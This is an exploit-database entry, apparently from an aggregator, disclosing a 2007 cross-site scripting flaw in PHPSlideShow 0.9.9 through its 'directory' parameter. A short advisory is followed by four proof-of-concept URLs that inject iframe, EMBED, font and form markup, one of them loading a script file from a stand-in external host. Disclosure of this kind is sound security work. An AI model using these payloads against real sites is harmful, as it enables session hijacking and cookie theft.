Lucene search
Jose Luis Gongora FernandezEDB-ID:30806HistoryNov 26, 2007 - 12:00 a.m.
PHPSlideShow 0.9.9 - 'Directory' Cross-Site Scripting
2007-11-2600:00:00
Jose Luis Gongora Fernandez
www.exploit-db.com
20
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/26575/info
PHPSlideShow is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects PHPSlideShow 0.9.9.2; other versions may also be vulnerable.
http://www.example.com/scripts/demo/phpslideshow.php?directory="><iframe> http://www.example.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> http://www.example.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" http://www.example.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E Related
cvelist
cvelist
CVE-2007-6135
2007-11-27 19:00:00
cve
cve
CVE-2007-6135
2007-11-27 19:46:00
nvd
nvd
CVE-2007-6135
2007-11-27 19:46:00
prion
prion
Cross site scripting
2007-11-27 19:46:00